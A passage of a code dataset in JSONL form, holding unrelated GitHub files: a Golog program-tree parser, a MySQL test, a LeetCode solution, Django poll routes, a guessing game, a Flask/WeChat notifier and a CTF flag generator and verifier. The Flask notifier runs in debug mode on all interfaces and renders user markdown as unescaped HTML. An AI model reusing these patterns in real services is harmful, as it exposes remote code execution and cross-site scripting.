'-':\n cur_sort = cp_group_var_sort.pop(0)\n for each_arg in exist_args_list:\n exist_args_dict[each_arg]= cur_sort\n add_global_args_declear_andlist_dict(each_arg,cur_sort) # action_args_declear_andlist_dict_define_in_GologTree_Nests_assgined_in_main_regression main.py\n exist_args_list = [] # ?x - Ball,?y - gripper\n self.const_declare_in_andlist.update(exist_args_dict) # \n # cp_arg_declare_list = copy.deepcopy(group[0])\n # while cp_arg_declare_list !=[]:\n # cur_char_variables = cp_arg_declare_list.pop(0)# pop\n # if cur_char_variables[0] == '?' and '-' in cp_arg_declare_list:\n # index_of_sort_declare = 1 + cp_arg_declare_list.index('-')\t# () ,+1\n # self.insertConsForSort(cur_char_variables,cp_arg_declare_list[index_of_sort_declare])\n # # andlist self.const_declare_in_andlist \n #\n self.FOL_Exp += 'Exists(['\n for each in group[0]:\n if each[0] == '?':\n self.FOL_Exp += each[1:]\n self.FOL_Exp += ','\n self.FOL_Exp = self.FOL_Exp[:-1] # \"[x,y,\"\" ==> \"[x,y\" \n self.FOL_Exp += '],' # [x,y],\n self.FOL_Exp += '(' # [x,y],(\n group.pop(0)\n self.Nested_list2FOLExpressionwithSituation(group[0],s_i,s_o)\n if self.FOL_Exp[-1] == ',':\n self.FOL_Exp = self.FOL_Exp[:-1] # del last ','\n self.FOL_Exp += ')'# '[x,y],(' ')'\n self.FOL_Exp += '),'# 'Exists([' ')'And()'('','\n elif cur == 'forall' or cur == 'ForAll' or cur == 'Forall':\n univer_args_list = []\n univer_args_dict = {} # GologTest\n cp_group_var_sort = copy.deepcopy(group[0])\n while(cp_group_var_sort):\n cur = cp_group_var_sort.pop(0)\n if cur[0] == '?':\n univer_args_list.append(cur)\n if cur == '-':\n cur_sort = cp_group_var_sort.pop(0)\n for each_arg in univer_args_list:\n univer_args_dict[each_arg]= cur_sort\n add_global_args_declear_andlist_dict(each_arg,cur_sort) # action_args_declear_andlist_dict_define_in_GologTree_Nests_assgined_in_main_regression main.py\n univer_args_list = [] # ?x - Ball,?y - gripper\n self.const_declare_in_andlist.update(univer_args_dict) # \n # \n self.FOL_Exp += 'ForAll(['\n for each in group[0]:\n if each[0] == '?':\n self.FOL_Exp += each[1:]\n self.FOL_Exp += ','\n self.FOL_Exp = self.FOL_Exp[:-1]\n self.FOL_Exp += '],'\n self.FOL_Exp += '('# 'ForAll([x,y],(' \n group.pop(0) # ['?x','-','BlockType']\n self.Nested_list2FOLExpressionwithSituation(group[0],s_i,s_o)\n if self.FOL_Exp[-1] == ',':\n self.FOL_Exp = self.FOL_Exp[:-1] # del last ',' \n self.FOL_Exp += ')'# 'ForAll([x,y],(' ')'\n self.FOL_Exp += '),'# 'Exists([' ')'And()\n elif cur == '==':\n if (type(group[0]) == type(group[1])) and (type(group[0]) == type(str())):\n self.FOL_Exp += '('+ (group[0].strip('?') + '==' + group[1].strip('?') + ','+s_i+'),')\n group.pop(0)\n else:\n raise Exception('Error usage of \\' == \\'.')\n break\n elif cur == '!=':\n if (type(group[0]) == type(group[1])) and (type(group[0]) == type(str())):\n self.FOL_Exp += '('+ (group[0].strip('?') + '!=' + group[1].strip('?') + ','+s_i+'),')\n group.pop(0)\n else:\n raise Exception('Error usage of \\' != \\'.')\n break\n else: # Predicates defined by users like \"clear A\"\n \n self.FOL_Exp += cur + '('\n if len(group) != 0:\n for each in group:\n self.FOL_Exp += each.strip('?') + ','\n group.clear() # above ['x','A'] --> []\n self.FOL_Exp = self.FOL_Exp[:-1] # del last ','\n self.FOL_Exp += ','+s_i+'),'\n else: # zero arg predicate like\"arm-empty\"\"\n self.FOL_Exp = self.FOL_Exp[:-1] # del last ','\n self.FOL_Exp += '('+s_i+'),'\n break\n else:\n raise Exception('Error Input format!')\n\n\nclass GologNode:\n def __init__(self,temptype,gologlist) -> None:\n self.type = str()\n if temptype in [':GologTest',':GologSeq',':GologOr',':GologPicksExists',':GologIfThen',':GologIfElse','and']:\n self.type = temptype\n else:\n self.type = ':GologActTerm' \n temp = gologlist[0].pop(0)\n self.ActionName = temp\n self.args = gologlist[0]\n self.situation_action_args = [] # [situation action args]\n self.set_of_s_io = set() # # set of tuple (s_i,s_o) for every nodes.built this only for the top node in classgologTree/loop_set_s_i_s_o\n \n self.const_declare_in_andlist = {} # ?arg_6,Nested_list3FOLExp().run_s\n # (situation input) --> (situation output)\n # Poss(s_i) == \\phi(s_i)\n # SSA:F(\\vec{x},s_output) == \\Psi_F(\\vec{x},\\delta,s_input)\n self.s_i = '' # situation input \n self.s_o = '' # situation output\n self.s_act = set() # set of tuple (situation,action) \n # self.total_pos_pre = []\n # self.total_neg_pre = []\n # self.total_pos_eff = []\n # self.total_neg_eff = []\n switch = {\n ':GologActTerm' : self.GologActTerm,\n 'and': self.LogicAnd_InGolog,\n ':GologTest' : self.GologTest , \n ':GologIfThen' : self.GologIfThen , \n ':GologIfElse' : self.GologIfElse , \n ':GologSeq' : self.GologSeq , \n ':GologOr' : self.GologOr ,\n ':GologPicksExists' : self.GologPicksExists\n }\n switch[self.type](gologlist)\n\n # ::= :GologActTerm\n def GologActTerm(self,gologlist):\n self.Actionargs = []\n for each in gologlist[0]:# [['?arg_1', 'A', '?arg_2']]\n if each[0] == '?':\n self.Actionargs.append(each[1:]) #?arg_1,A,?arg_2... \n else:\n self.Actionargs.append(each)# Exist- blockType,\n\n\n # ::= :GologTest \n def GologTest(self,cnf_in_Golog_list): \n self.andlist = cnf_in_Golog_list\n self.neg_andlist = []\n self.pos_andlist = []\n for each in self.andlist:\n if each[0] == \"not\":\n self.neg_andlist.append(each)\n else:\n self.pos_andlist.append(each) # \n\n # ::= and\n def LogicAnd_InGolog(self,cnf_in_Golog_list):\n self.andlist = cnf_in_Golog_list \n self.neg_andlist = []\n self.pos_andlist = []\n for each in self.andlist:\n if each[0] == \"not\":\n self.neg_andlist.append(each)\n else:\n self.pos_andlist.append(each) # \n\n # ::= :GologIfThen \n def GologIfThen(self,gologlist):\n self.cond = gologlist[0]\n self.thenlist = gologlist[1] # Golog-,GologExpr,,AST \n\n # ::= :GologIfElse \n def GologIfElse(self,gologlist):\n self.cond = self.LogicAnd_InGolog (gologlist[0])\n # self.ifTrue = GologActTerm(Gologlist[1]) # recursively,it also could be GologExpr,it can be GologAction at most times.\n # self.elseFalse = GologActTerm(Gologlist[2])\n self.ifTrue = gologlist[1] # Golog- \n self.elseFalse = gologlist[2] # Golog- \n\n # ::= :GologSeq \n def GologSeq(self,gologlist):\n self.GologSeqNodes = [] # \n # for each in Gologlist :\n # self.GologProgramsSeq.append(GologActTerm(each)) # Seq,\n self.GologSeqlist = gologlist # [delta_1,delta_2,...,delta_n] ,list\n # self.GologSeqNodes_init = None # [delta_1,delta_2,delta_3,...] ==> [':GologSeq', [':GologSeq',delta_1,delta_2,], delta_3]\n # self.GologSeqNodes_tail = None # Seq[Golog1,Golog2,...]\n \n # ::= :GologOr \n def GologOr(self,gologlist):\n self.GologOrNodes = [] # \n self.GologOrlist = gologlist # Golog- Or[Golog1,Golog2,...]\n\n # ::= :GologPicksExists\n def GologPicksExists(self,gologlist):\n self.PickVars = []\n for each in gologlist[0]:\n if each[0] == '?':\n self.PickVars.append(each[1:])\n self.ExistsFormula = gologlist[1] # Golog-,\n\n def dump_golog_tree_pre(self) -> str:\n formula = \"\"\n def list_args2str(argslist):\n args2str = '['\n for each in argslist:\n args2str+=each+','\n if args2str[-1] == ',':\n args2str = args2str[:-1]\n args2str+='],'\n return args2str\n def actionlist2str(ActionName,actiontermlist,s_i):\n actiontermlist_str = 'Poss('+ActionName + '('\n if len(actiontermlist) >= 1:# ,\n for each in actiontermlist:\n if each[0] == '?':\n actiontermlist_str += each[1:] + ',' # ?x ?y\n else:\n actiontermlist_str += each + ',' # A,B,LEFT,RIGHT\n if actiontermlist_str[-1] == ',':# \n actiontermlist_str = actiontermlist_str[:-1]\n actiontermlist_str += '),'+ s_i +')'# \n return actiontermlist_str\n if self.type ==':GologActTerm':\n formula += '' + actionlist2str(self.ActionName,self.Actionargs,self.s_i) \n elif self.type == 'and':\n # print(str(self.andlist[0]))\n andlist_str,returned_const_declare_in_andlist = Nested_list2FOLExp().run_s(copy.deepcopy(self.andlist[0]),self.s_i,self.s_o)\n # if '?arg_1' in returned_const_declare_in_andlist.keys():\n # print()\n self.const_declare_in_andlist.update(returned_const_declare_in_andlist)\n # andlist_str = str(self.andlist)\n formula += ''+ andlist_str \n elif self.type == ':GologTest':\n # print(str(self.andlist[0])) #['and', ['holding', '?x'], ['not', ['above', '?x', 'A']], ['clear', '?y']]\n andlist_str,returned_const_declare_in_andlist = Nested_list2FOLExp().run_s(copy.deepcopy(self.andlist[0]),self.s_i,self.s_o)\n # if '?arg_1' in returned_const_declare_in_andlist.keys():\n # print()\n self.const_declare_in_andlist.update(returned_const_declare_in_andlist)\n # andlist_str = str(self.andlist)\n formula += ''+ andlist_str \n elif self.type == ':GologSeq': # if ;then\n temp = '' + 'And(\\n '\n for each in reversed(self.GologSeqNodes):\n temp = temp + each.dump_golog_tree_pre() + ',\\n '\n if temp[-1] == ',':\n temp = temp[:-1]\n formula += temp+')' \n elif self.type == ':GologOr':\n temp = '' + 'Or(\\n '\n for each in self.GologOrNodes:\n temp = temp + each.dump_golog_tree_pre() + ',\\n '\n if temp[-1] == ',':\n temp = temp[:-1]\n formula += temp+')' \n elif self.type == ':GologPicksExists':\n formula += '' + 'Exists('+list_args2str(self.PickVars)+'\\n '+ self.ExistsFormula.dump_golog_tree_pre() +')'\n else:\n raise Exception(\"not such \" + self.type)\n return formula\n\n \n def __str__(self) -> str:\n if self.type ==':GologActTerm':\n return'\\n'+ str(self.type) + self.ActionName + '\\nAction args is:' + str(self.Actionargs) + '\\n'\n elif self.type == 'and':\n return str(self.type) + '\\nand:\\n'+str(self.andlist)\n elif self.type == ':GologTest':\n return str(self.type) + '\\n'+str(self.andlist[0]) \n elif self.type == ':GologIfThen':\n return str(self.type) + '\\nIf:\\n'+str(self.cond) + '\\nThen do:\\n'+ str(self.thenlist) \n elif self.type == ':GologIfElse':\n return str(self.type) + '\\nIfElse:\\n'+str(self.cond) + '\\nIfTrue:\\n'+str(self.ifTrue) +'\\nElse false:\\n'+str(self.elseFalse) \n elif self.type == ':GologSeq':\n result = str(self.type) + '\\n'\n for each in self.GologSeqNodes:\n result = result + str(each)\n return result\n elif self.type == ':GologOr':\n result = str(self.type) + '\\n'\n for each in self.GologOrNodes:\n result = result + str(each)\n return result\n elif self.type == ':GologPicksExists':\n return str(self.type) + '\\nvars:'+str(self.PickVars)+'\\n'+ str(self.ExistsFormula)\n else:\n raise Exception(\"not such \" + self.type)\n \n def print_pre_eff(self) -> str:\n print(str(self.total_neg_pre) +'\\n'+ str(self.total_pos_pre) +'\\n'+ str(self.total_neg_eff) +'\\n'+ str(self.total_neg_eff))\n \n def set_total_pre_eff(self): # recursive for each situation\n pass \n \n\nclass GologExprTree:\n # @staticmethod\n def recursive_build_golog_tree(self,gologlist):\n \"\"\"Golog programs contains:\n :GologActTerm\n :GologIfThen\n :GologIfElse\n and\n :GologTest\n :GologSeq\n :GologOr\n :GologPicksExists\"\"\"\n temptype = gologlist.pop(0) # :GologActTerm ......\n node = GologNode(temptype,gologlist) # build the Golog Node\n # print(self.total_pos_pre)\n # print(self.total_neg_pre)\n # print(self.total_pos_eff)\n # print(self.total_neg_eff)\n if node.type ==':GologActTerm':\n # print(node.ActionName) \n # print(node.Actionargs)\n pass\n elif node.type == 'and':\n # print(node.andlist)\n # print(node.neg_andlist)\n # print(node.pos_andlist)\n pass\n elif node.type == ':GologTest':\n # print(node.andlist)\n # print(node.neg_andlist)\n # print(node.pos_andlist)\n pass\n elif node.type == ':GologIfThen':\n # print(node.cond)\n # print(node.thenlist) # list\n node.thenlist = self.recursive_build_golog_tree(node.thenlist) # class \n elif node.type == ':GologIfElse':\n # print(node.cond)\n # print(node.ifTrue)# list-->node\n node.ifTrue = self.recursive_build_golog_tree(node.ifTrue) # class \n # print(node.elseFalse)# list-->node\n node.elseFalse = self.recursive_build_golog_tree(node.elseFalse) # class \n elif node.type == ':GologSeq':\n # print(len(node.GologSeqlist))# list\n for each in node.GologSeqlist:\n node.GologSeqNodes.append(self.recursive_build_golog_tree(each)) # class \n # node.GologSeqNodes_init = node.GologSeqNodes[:-1] # [delta_1,delta_2,delta_3,...] ==> [':GologSeq', [':GologSeq',delta_1,delta_2,], delta_3]\n # node.GologSeqNodes_tail = node.GologSeqNodes[-1] # the last delta_n Golog- Seq[Golog1,Golog2,...]\n if len(node.GologSeqNodes) == 2:\n pass\n elif len(node.GologSeqNodes) > 2:\n pass\n else:\n raise Exception(\"\\'len(node.GologSeqlist) < 0\\' is not allow.\")\n elif node.type == ':GologOr':\n # print(node.GologOrlist)# list\n for each in node.GologOrlist:\n node.GologOrNodes.append( self.recursive_build_golog_tree(each) )# list of class \n elif node.type == ':GologPicksExists':\n # print(node.PickVars)\n # print(node.ExistsFormula)# list-->node\n node.ExistsFormula = self.recursive_build_golog_tree(node.ExistsFormula) # list of class \n else:\n raise Exception(\"not such \" + node.type)\n return node\n\n def loop_set_s_i_s_o(self,golog):\n output_split_id = 0# 'Or' node will split s_o into s_o_1,s_o_2,s_o_3,......\n s_id = 0 # numeric identifier for middle situation.we set s'initial situation';s_ 'goal situation'. ther is no 's0' here.initial is 's',goal situation is s_\n set_of_s_io = set() # # set of tuple (s_i,s_o) for every nodes.\n s_act = set() # set of tuple (situation,action) \n golog.s_i = 's_i' # s_input = 's'\n golog.s_o = 's_o' # s_output = 's_'\n golog.const_declare_in_andlist = {} # gologandlitsgolog.const_declare_in_andlist,?arg_6\n from collections import deque\n fathernode = golog\n q = deque([golog])\n # global_situation_tree_mid_act_args_number = 0 # GologExists GologTestrefinement\n situation_action_args = []# \n while len(q) > 0:\n curnode = q.pop()\n # print(curnode.type)\n \n if curnode.type ==':GologActTerm':\n # if curnode.ActionName == 'pick':\n # print()\n if curnode.s_i == '': # had not changed yet\n curnode.s_i = fathernode.s_i\n if curnode.s_o == '': # had not changed yet\n curnode.s_o = fathernode.s_o\n set_of_s_io.add((curnode.s_i,curnode.s_o))\n if (curnode.s_i,curnode.ActionName) not in s_act: # the first see this (mid_situation,action)\n # pddlact_arg-12345... curnode.Actionargs\n s_act.add((curnode.s_i,curnode.ActionName))# \n situation_action_args.append(list((curnode.s_i,curnode.ActionName)) + curnode.Actionargs) # refinementMap\n # ,‘’, act_arg_123\n # print(curnode.ActionName)\n # print(curnode.Actionargs)\n \n elif curnode.type == 'and': # canceled\n if curnode.s_i == '': # had not changed yet\n curnode.s_i = fathernode.s_i\n if curnode.s_o == '': # had not changed yet\n curnode.s_o = fathernode.s_o\n set_of_s_io.add((curnode.s_i,curnode.s_o))\n s_act.add((curnode.s_i,'and')) # test\n situation_action_args.append(list((curnode.s_i,':GologTest')))#!!!!!!!!!!test,“/”\n # print(curnode.andlist)\n # print(curnode.neg_andlist)\n # print(curnode.pos_andlist)\n golog.const_declare_in_andlist.update(curnode.const_declare_in_andlist)# gologandlitsgolog.const_declare_in_andlist,?arg_6\n elif curnode.type == ':GologTest':\n if curnode.s_i == '': # had not changed yet\n curnode.s_i = fathernode.s_i\n if curnode.s_o == '': # had not changed yet\n curnode.s_o = fathernode.s_o\n set_of_s_io.add((curnode.s_i,curnode.s_o))\n s_act.add((curnode.s_i,':GologTest'))\n situation_action_args.append(list((curnode.s_i,':GologTest')))\n golog.const_declare_in_andlist.update(curnode.const_declare_in_andlist) # gologandlitsgolog.const_declare_in_andlist,?arg_6\n # print(curnode.andlist)\n # print(curnode.neg_andlist)\n # print(curnode.pos_andlist)\n\n elif curnode.type == ':GologSeq':\n if curnode.s_i == '': # had not changed yet\n curnode.s_i = fathernode.s_i\n if curnode.s_o == '': # had not changed yet\n curnode.s_o = fathernode.s_o\n # set_of_s_io.add((curnode.s_i,curnode.s_o))# Only :Test,:ActionTerm is needed for the Regression,never get this \n # print(len(curnode.GologSeqNodes))# \n curnode.GologSeqNodes[0].s_i = curnode.s_i\n curnode.GologSeqNodes[-1].s_o = curnode.s_o\n if len(curnode.GologSeqNodes) <=1:\n raise Exception('Seq must have elemnts > 1')\n elif len(curnode.GologSeqNodes) == 2:\n s_id = s_id + 1 #\n curnode.GologSeqNodes[0].s_o = 's' + str(s_id)\n curnode.GologSeqNodes[1].s_i = 's' + str(s_id)\n q.append(curnode.GologSeqNodes[0])\n q.append(curnode.GologSeqNodes[1])\n # set_of_s_io.add((curnode.GologSeqNodes[0].s_i,curnode.GologSeqNodes[0].s_o))\n # set_of_s_io.add((curnode.GologSeqNodes[1].s_i,curnode.GologSeqNodes[1].s_o))\n else:# len(curnode.GologSeqNodes) > 2\n for index in range(0,len(curnode.GologSeqNodes)):\n q.append(curnode.GologSeqNodes[index])\n if index == 0: # the first\n curnode.GologSeqNodes[index].s_o = 's' + str(s_id)\n if index == len(curnode.GologSeqNodes)-1: # the last\n curnode.GologSeqNodes[index].s_i = 's' + str(s_id)\n # len() > 2\n if index != 0 and index != len(curnode.GologSeqNodes)-1 : # skip the first s_i/the last s_o already assigned above\n s_id = s_id + 1 # s_1,2,3,4,\n curnode.GologSeqNodes[index].s_i = 's' + str(s_id)\n curnode.GologSeqNodes[index].s_o = 's' + str(s_id+1) # here had not changed 's_id' yet\n # set_of_s_io.add((curnode.GologSeqNodes[index].s_i,curnode.GologSeqNodes[index].s_o))# Only :Test,:ActionTerm is needed for the Regression,never get this \n \n elif curnode.type == ':GologOr':\n if curnode.s_i == '': # had not changed yet\n curnode.s_i = fathernode.s_i\n if curnode.s_o == '': # had not changed yet\n curnode.s_o = fathernode.s_o\n # set_of_s_io.add((curnode.s_i,curnode.s_o))# Only :Test,:ActionTerm is needed for the Regression,never get this \n # print(curnode.GologOrNodes) # \n for index in range(0,len(curnode.GologOrNodes)):\n q.append(curnode.GologOrNodes[index])\n output_split_id = output_split_id + 1\n curnode.GologOrNodes[index].s_i = curnode.s_i\n curnode.GologOrNodes[index].s_o = curnode.s_o + '_' + str(output_split_id)\n # set_of_s_io.add((curnode.s_i,curnode.s_o))# Only :Test,:ActionTerm is needed for the Regression,never get this \n \n elif curnode.type == ':GologPicksExists':\n if curnode.s_i == '': # had not changed yet\n curnode.s_i = fathernode.s_i\n if curnode.s_o == '': # had not changed yet\n curnode.s_o = fathernode.s_o\n # set_of_s_io.add((curnode.s_i,curnode.s_o))# Only :Test,:ActionTerm is needed for the Regression,never get this \n # print(curnode.PickVars)\n # print(curnode.ExistsFormula)# \n q.append(curnode.ExistsFormula)\n else:\n raise Exception(\"not such \" + curnode.type)\n fathernode = curnode # update\n golog.set_of_s_io = set_of_s_io# set of tuple (s_i,s_o) for every nodes.\n golog.s_act = s_act # # set of tuple (situation,action) \n golog.situation_action_args = situation_action_args # [situation action args]\n\n\n","repo_name":"sysulic/AVS","sub_path":"GologProgramTree.py","file_name":"GologProgramTree.py","file_ext":"py","file_size_in_byte":35627,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"25067824171","text":"\"\"\"\n Test of mysql connector\n\"\"\"\n\nfrom swallow.inout.Mysqlio import Mysqlio\nfrom multiprocessing import JoinableQueue\n\ndef test_basic():\n in_queue = JoinableQueue()\n\n mysql_reader = Mysqlio('localhost','3600','test','root','') \n mysql_reader.scan_and_queue(in_queue,\"SELECT * FROM swallow\")\n\n assert in_queue.qsize() == 3\n\n res = []\n while not in_queue.empty():\n res.append(in_queue.get())\n\n expected_res = [{'id':1,'libelle':'test'},{'id':2,'libelle':'john'},{'id':3,'libelle':'woo'}]\n\n assert res == expected_res\n","repo_name":"pagesjaunes/swallow","sub_path":"test/test_mysql.py","file_name":"test_mysql.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"72"} +{"seq_id":"27934672840","text":"class TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution(object):\n # 方法返回当前节点是否要删除\n def dfs(self, node, sums, limit):\n # 递归终止条件\n if not node.left and not node.right:\n return node.val + sums < limit\n # 默认左右子树都需要删除,后面如果左右节点为空时才能处理\n l_tree_del, r_tree_del = True, True\n # 递归判断左右子树是否需要删除\n if node.left:\n l_tree_del = self.dfs(node.left, node.val + sums, limit)\n if node.right:\n r_tree_del = self.dfs(node.right, node.val + sums, limit)\n # 需要删除则置位空\n if l_tree_del:\n node.left = None\n if r_tree_del:\n node.right = None\n # 左右子树都需要删除时,当前节点就需要删除\n return l_tree_del and r_tree_del\n\n def sufficientSubset(self, root, limit):\n root_del = self.dfs(root, 0, limit)\n if root_del:\n return None\n return root","repo_name":"linwt/nowcoder-leetcode","sub_path":"leetcode_Python/1080.根到叶路径上的不足节点.py","file_name":"1080.根到叶路径上的不足节点.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"72"} +{"seq_id":"29871669119","text":"from django.urls import path\n\nfrom . import views\n\napp_name = \"polls\"\n\nurlpatterns = [\n path('/', views.poll_detail, name='detail'),\n path('list/', views.polls_list, name='list'), \n path(\"add-poll//\", views.polls_add, name=\"add_poll\"),\n path('delete/', views.poll_delete, name=\"delete_poll\"),\n path(\"edit//\", views.polls_edit, name=\"edit_poll\"),\n path('add-choice//', views.create_choice, name='add_choice'),\n path('add-choice-clone//', views.choice_protocol, name=\"protocol_choice\"),\n path('detail/choices//', views.choices_list, name=\"list_choice\"),\n path('edit/choice//', views.choice_edit, name=\"edit_choice\"),\n path('delete/choice//', views.choice_delete, name=\"delete_choice\"),\n path('vote/start//', views.vote_start, name=\"start_vote\"),\n path('vote/view/scroll//', views.vote_scroll, name=\"scroll_view\"),\n path('vote/submit_choices/', views.submit_choices, name=\"submit_choices\"),\n path('vote/view/page//', views.vote_page, name=\"page_view\"),\n path('vote/submit_choice//', views.submit_choice, name=\"submit_choice\"),\n path('vote-edit/page/', views.vote_reset, name=\"reset_vote\"),\n path('vote-edit/scroll/', views.scroll_reset, name=\"scroll_reset\"),\n\n # Charts URLS\n path('result//', views.poll_result, name='result_poll'),\n path('result-sex//', views.poll_sex, name='result_sex'),\n\n # Table URLS\n path('results-sex-table/', views.sex_table, name='table_sex'),\n path('results-table/', views.result_table, name='table_result'),\n\n # Percent URLS\n path('result-female-percent/', views.male_percent, name='percent_male'),\n path('result-male-percent/', views.female_percent, name='percent_female'),\n path('result-percent/', views.poll_total_percent, name='percent_poll'),\n]\n","repo_name":"Alyzbane/AnalysenKompass","sub_path":"pev/polls/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3976585865","text":"from random import randint\n\njackpot = randint(1,100)\n\npoints = 99 #He will take atleast one guess, as mentioned in rules :P\nfl = 0\n#print(jackpot)\nwhile True:\n while True:\n num = int(input(\"Your Guess Please : \"))\n if num>=1 and num<=100:\n break\n else:\n print(\"Between 1-100 Dude!\")\n if num == jackpot:\n break\n else:\n points-=1\n if points < 0:\n print(\"I can't take it anymore :'(\")\n fl = 1\n break\n diff = jackpot - num\n if diff > 25:\n print(\"Your guess is too low\")\n elif diff > 0:\n print(\"Your guess is low\")\n elif diff < -25:\n print(\"Your guess is too high\")\n else:\n print(\"Your guess is high\")\nif fl == 0: \n if points > 90:\n print(\"Bro fly to Vegas! \"+str(points)+\" Points!!\")\n elif points > 50:\n print(\"Yaa Whatever \"+str(points)+\" Points\")\n else:\n print(\"Where were we?! \"+str(points)+\" Points\")\n \n \n \n \n \n","repo_name":"ryuzakace/phantasmagoria","sub_path":"gog.py","file_name":"gog.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"20568605488","text":"import flask\nimport markdown\nimport uuid\nimport os\nimport redis\nimport requests\nimport time\nimport re\nimport json\nwith open('cfg.json','r') as f:\n cfg=json.load(f)\n\npool=redis.ConnectionPool(host=cfg['redis_ip'],port=cfg['redis_port'],password=cfg['redis_pass'])\nredisClient=redis.StrictRedis(connection_pool=pool)\n#30天\nexpire_ms=1000*60*60*24*30\napp=flask.Flask(__name__)\nroot_path=os.path.realpath(os.path.split(__file__)[0])\n\ndef md2html(md_content):\n exts=['markdown.extensions.extra','markdown.extensions.codehilite','markdown.extensions.tables',\n 'markdown.extensions.toc']\n html=markdown.markdown(md_content,extensions=exts)\n content = flask.Markup(html)\n return content\n\n@app.route('/view/',methods=['GET'])\ndef view(id):\n mark=redisClient.get(f'{cfg[\"redis_tag\"]}{id}')\n if mark:\n content=md2html(mark.decode('utf-8'))\n html=flask.render_template('index.html',**locals())\n return html\n return None\n\n# @app.route('/save/',methods=['post','get'])\ndef save(mark):\n while True:\n id=uuid.uuid4().hex\n has=redisClient.get(f'{cfg[\"redis_tag\"]}{id}')\n if not has:\n break\n redisClient.set(f'{cfg[\"redis_tag\"]}{id}',str(mark).encode('utf-8'))\n redisClient.expire(f'{cfg[\"redis_tag\"]}{id}',expire_ms)\n return id\n\ndef digest_mark(mark):\n # 去掉markdown标签\n pattern = '[\\\\\\`\\*\\_\\[\\]\\#\\+\\-\\!\\>]'\n content = re.sub(pattern, '', mark)\n #取前150字符作为文章摘要\n return content#[:155]\n\ndef get_url(title,content):\n mark = f'###{title}\\n----\\n{content}'\n id = save(mark)\n url = f\"{cfg['base_url']}view/{id}\"\n return url\n\n@app.route('/send',methods=['post','get'])\ndef send():\n args=flask.request.args\n app_id=args.get('sendkey')\n title=args.get('text')\n content=args.get('desp')\n if not content: content=''\n\n secret = cfg['agents'].get(app_id)\n if not secret:\n return 'sendkey is invaliad, please contact with admin to check sendkey'\n #获取access_token\n token_url=\"https://qyapi.weixin.qq.com/cgi-bin/gettoken?corpid=%s&corpsecret=%s\"%(cfg['corp_id'],secret)\n result=requests.get(token_url)\n dict_result=result.json()\n access_token=dict_result['access_token']\n\n #生成通过post请求发送消息的url\n post_url=\"https://qyapi.weixin.qq.com/cgi-bin/message/send?access_token=%s\"%(access_token)\n post_data={\n \"touser\":\"@all\",\n \"agentid\":app_id,\n \"msgtype\":\"textcard\",\n \"textcard\":{\n \"title\" : title,\n \"description\" : f\"
    {time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time()))}
    {digest_mark(content)}\",\n \"url\" : get_url(title,content),\n \"btntxt\":\"详情\"\n },\n }\n data = json.dumps(post_data,quote_keys=True)\n headers = {'content-type':'application/json','charset':'utf-8'}\n result = requests.post(post_url,data=data,headers=headers)\n return result.text,result.status_code,result.headers.items()\n\nif __name__=='__main__':\n app.debug=True\n app.run(host='0.0.0.0',port=8888)\n","repo_name":"eachout/wechat_msg","sub_path":"wechat_msg.py","file_name":"wechat_msg.py","file_ext":"py","file_size_in_byte":3086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32377769869","text":"import base64\nimport binascii\nimport hashlib\nfrom hmac import compare_digest\nimport struct\nimport time\nimport zlib\n\n# Length of the MAC (in bytes)\nMAC_LEN = 9\n# Length of the payload (in bytes)\nPAYLOAD_LEN = 8\n# timestamp + team + service + payload\nDATA_LEN = 4 + 2 + 1 + PAYLOAD_LEN\n# Flag validity in seconds\nVALID = 900\n\n\ndef generate(team_net_no, service_id, secret, prefix='FLAG_', payload=None, timestamp=None):\n \"\"\"\n Generates a flag for the given arguments. This is deterministic and should always return the same\n result for the same arguments (and the same time, if no timestamp is explicitly specified).\n\n Args:\n team_net_no: Net number of the team protecting this flag\n service_id: ID of the service this flag belongs to\n payload: 8 bytes of data to store in the flag, defaults to zero-padded\n CRC32(timestamp, team, service)\n timestamp: Timestamp at which the flag expires, defaults to 15 minutes in the future\n \"\"\"\n\n if timestamp is None:\n timestamp = time.time() + VALID\n\n if team_net_no > 65535:\n raise ValueError('Team net number must fit in 16 bits')\n protected_data = struct.pack(\"!i H c\", int(timestamp), team_net_no, bytes([service_id]))\n\n if payload is None:\n payload = struct.pack(\"!I I\", zlib.crc32(protected_data), 0)\n if len(payload) != PAYLOAD_LEN:\n raise ValueError('Payload {} must be {:d} bytes long'.format(repr(payload), PAYLOAD_LEN))\n\n protected_data += payload\n mac = _gen_mac(secret, protected_data)\n\n return prefix + base64.b64encode(protected_data + mac).decode('ascii')\n\n\ndef verify(flag, secret, prefix='FLAG_'):\n \"\"\"\n Verfies flag validity and returns data from the flag.\n Will raise an appropriate exception if verification fails.\n\n Returns:\n Data from the flag as a tuple of (team, service, payload, timestamp)\n \"\"\"\n\n if not flag.startswith(prefix):\n raise InvalidFlagFormat()\n\n try:\n raw_flag = base64.b64decode(flag[len(prefix):])\n except binascii.Error:\n raise InvalidFlagFormat()\n\n try:\n protected_data, flag_mac = raw_flag[:DATA_LEN], raw_flag[DATA_LEN:]\n except IndexError:\n raise InvalidFlagFormat()\n\n mac = _gen_mac(secret, protected_data)\n if not compare_digest(mac, flag_mac):\n raise InvalidFlagMAC()\n\n timestamp, team, service = struct.unpack(\"!i H c\", protected_data[:7])\n payload = protected_data[7:]\n if time.time() - timestamp > 0:\n raise FlagExpired(time.time() - timestamp)\n\n return (int(team), int.from_bytes(service, 'big'), payload, timestamp)\n\n\ndef _gen_mac(secret, protected_data):\n\n # Keccak does not need an HMAC construction, the secret can simply be prepended\n sha3 = hashlib.sha3_256()\n sha3.update(secret)\n sha3.update(protected_data)\n return sha3.digest()[:MAC_LEN]\n\n\nclass FlagVerificationError(Exception):\n \"\"\"\n Base class for all Flag Exceptions.\n \"\"\"\n\n\nclass InvalidFlagFormat(FlagVerificationError):\n \"\"\"\n Flag does not 